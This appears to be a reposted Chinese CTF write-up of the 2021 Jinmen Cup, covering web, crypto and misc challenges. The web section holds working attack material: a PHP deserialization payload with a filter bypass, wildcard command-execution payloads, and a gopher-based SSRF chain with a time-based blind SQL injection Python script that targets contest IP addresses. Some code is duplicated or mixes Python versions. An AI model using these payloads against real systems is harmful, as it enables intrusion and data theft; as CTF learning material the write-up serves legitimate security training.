2021津门杯web部分复现
作者:互联网
Web
1、power_out
通过分析(停电)可以知道可能是有备份文件或者编辑器异常退出时保存的记录。
扫描目录或者查看常见的目录
vim编辑器备份文件
.index.php.swp(找到文件下载)
.index.php.swo
.index.php.swn
发现乱码
b0VIM 7.4 o慲? 4 root 7fa16b649c4b /var/www/html/img/index.php
3210 #"! U tp ? ad %
= ? ? ? ? ? ? ? ? i 7 ? ? ? ? ? ? t U @ : 7 ? ? ? ? ? ? ? ? ? x
r
q
X
1
? ? ? ? ~ i c b G & ? ? ? ? ? ? ? ? M E = < </html> </body> <p><br/>鏄ㄥぉ鏅氫笂鍥犱负14绾уぇ椋庡仠鐢典簡.</p> <body> <html> ?> $log_unser = unserialize($log); $log = str_replace('flag','',$log); $log = preg_replace("/[<>*#'|?\n ]/","",$log); $log = $_GET['log']; } } echo "this is destruct"; function __destruct(){ } return $str; $str=str_replace('flag','',$str); $str=preg_replace("/[<>*#'|?\n ]/","",$str); public function waf($str){ } $obj = new logger($this->weblogfile); // self::waf($this->filepath); function __wakeup(){ } echo "$flag"; $flag="system('cat /flag')"; function __construct() { public $weblogfile; class weblog { } } echo "this is destruct"; function __destruct(){ } fclose($fd); fwrite($fd,$msg."\n"); $fd=fopen($this->logFile,"a+"); function log($msg){ } readfile($this->logFile); $this->logFile = $file; $this->exitMsg="#--session end--#\n"; $this->initMsg="#--session started--#\n"; // initialise variables function __construct($file){ public $exitMsg; public $initMsg; public $logFile; class logger{ <?php
vim -r 恢复文件
<?php
class logger{
public $logFile;
public $initMsg;
public $exitMsg;
function __construct($file){
// initialise variables
$this->initMsg="#--session started--#\n";
$this->exitMsg="#--session end--#\n";
$this->logFile = $file;
readfile($this->logFile);
}
function log($msg){
$fd=fopen($this->logFile,"a+");
fwrite($fd,$msg."\n");
fclose($fd);
}
function __destruct(){
echo "this is destruct";
}
}
class weblog {
public $weblogfile;
function __construct() {
$flag="system('cat /flag')";
echo "$flag";
}
function __wakeup(){
// self::waf($this->filepath);
$obj = new logger($this->weblogfile);
}
public function waf($str){
$str=preg_replace("/[<>*#'|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
function __destruct(){
echo "this is destruct";
}
}
class weblog {
public $weblogfile;
function __construct() {
$flag="system('cat /flag')";
echo "$flag";
}
function __wakeup(){
// self::waf($this->filepath);
$obj = new logger($this->weblogfile);
}
public function waf($str){
$str=preg_replace("/[<>*#'|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
function __destruct(){
echo "this is destruct";
}
}
$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);
?>
<html>
<body>
<p><br/>昨天晚上因为14级大风停电了.</p>
</body>
</html>
发现是反序列化,构造weblog类,通过readfile($this->logFile);
得到flag
flag双写绕过
<?php
class weblog {
public $weblogfile = '/flflagag';
function __construct() {
$flag="system('cat /flag')";
echo "$flag";
}
function __wakeup(){
// self::waf($this->filepath);
$obj = new logger($this->weblogfile);
}
}
$a = new weblog();
echo serialize($a);
O:6:“weblog”:1:{s:10:“weblogfile”;s:9:"/flflagag";}
2、hate_php
发现是命令执行,发现字母,数字、$、等被过滤了,通过<?= ?>
可绕过,
使用通配符读取文件,cat命令在usr/bin/cat
,网站根目录一般在/var/www/html/
所以可以直接用通配符读取网站内容。`
<?=`/???/???/ /???/???/????` ?>
然而找了半天没找到,进一步扩大范围
<?=`/???/???/ /???` ?>
哦豁找到了,就在这。
(刚开始思路是无数字字母,构造命令,结果试半天好像不行。哪有通配符来的快haha)
easy_sql
<?php
highlight_file(__FILE__);
session_start();
$url = $_GET['url'] ?? false;
if($url)
{
$a = preg_match("/file|dict/i", $url);
if ($a==1)
{
exit();
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
?>
刚开始是想ssrf利用gopher打mysql,但是没有用户名,爆破也没成功,无奈放弃。。。
具体参考大佬的博客 宸极实验室
同时目录扫描发现admin.php
结合题目为easysql
猜测为admin.php进行post注入
http://122.112.251.23:20001/?url=gopher://127.0.0.1:80/_POST%2520%2fadmin.php%2520HTTP%2f1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application%2fx-www-form-urlencoded%250D%250AContent-Length%253A%25207%250D%250A%250D%250Apoc%253D123%250D%250A
url=gopher://127.0.0.1:80/_POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
poc=123
最终得到有用payload为:
1) and sleep(10) and(1=1
之后就是写脚本进行盲注了,脚本如下:
# -*- coding: utf-8 -*-
import urllib
import requests
import time
flag='flag is :'
s = '0123456789abcdefghijklmnopqrstuvwxyz~!@#$%{}-_'
for i in range(100):
for ss in s:
payload = "poc=1)and if(substr((select user()),%d,1)='%s',sleep(5),0) and (1=1" % (i,ss)
#print(payload)
test =\
"""POST /admin.php HTTP/1.1
Host:127.0.0.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close
%s
""" % (len(payload),payload)
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
new = new.replace('%','%25')
result = '_'+new
url = 'http://121.36.147.29:20001/?url=gopher://127.0.0.1:80/'+result
print(url)
startTime=time.time()
data= requests.get(url).content[3400:]
if(time.time() - startTime > 5):
flag += ss
print flag
uploadhub
gooss
Crypto
1、RSA
小李截获一个RSA加密信息,能帮忙解开吗?
c=58703794202217708947284241025731347400180247075968200121227051434588274043273799724484183411072837136505848853313100468119277511144235171654313035776616454960333999039452491921144841080778960041199884823368775400603713982137807991048133794452060951251851183850000091036462977949122345066992308292574341196418e=119393861845960762048898683511487799317851579948448252137466961581627352921253771151013287722073113635185303441785456596647011121862839187775715967164165508224247084850825422778997956746102517068390036859477146822952441831345548850161988935112627527366840944972449468661697184646139623527967901314485800416727
n=143197135363873763765271313889482832065495214476988244056602939316096558604072987605784826977177132590941852043292009336108553058140643889603639640376907419560005800390316898478577088950660088975625569277320455499051275696998681590010122458979436183639691126624402025651761740265817600604313205276368201637427
发现e,n很大,用师傅的
rsa-wiener-attack
MISC
混合编码
JTJGMTAyJTJGMTA4JTJGOTclMkYxMDMlMkYxMjMlMkYxMTMlMkY0OSUyRjEyMCUyRjc1JTJGMTEyJTJGMTA5JTJGNTYlMkYxMTglMkY3MyUyRjc2JTJGODclMkYxMTQlMkYxMDclMkYxMDklMkY4OCUyRjEyMCUyRjg2JTJGNTQlMkYxMDYlMkY0OSUyRjQ5JTJGNzclMkYxMDAlMkY5OSUyRjcxJTJGMTE2JTJGNzYlMkYxMjIlMkYxMTglMkY4MiUyRjEyMSUyRjg2JTJGMTI1
推测base64,先进行base64解码
%2F102%2F108%2F97%2F103%2F123%2F113%2F49%2F120%2F75%2F112%2F109%2F56%2F118%2F73%2F76%2F87%2F114%2F107%2F109%2F88%2F120%2F86%2F54%2F106%2F49%2F49%2F77%2F100%2F99%2F71%2F116%2F76%2F122%2F118%2F82%2F121%2F86
芜湖~
urldecode
/102/108/97/103/123/113/49/120/75/112/109/56/118/73/76/87/114/107/109/88/120/86/54/106/49/49/77/100/99/71/116/76/122/118/82/121/86
转ASCII
m1bmp
LSB隐写,base64解码可得flag
flag{l5DGqF1pPzOb2LU919LMaBYS5B1G01FD}
m0usb
12.pcapng
流量分析
发现是键盘信息,用脚本提取数据。
发现是一串数字,百度搜索是云影加密
标签:function,web,津门,__,flag,2021,str,public,log 来源: https://blog.csdn.net/weixin_44033675/article/details/116905572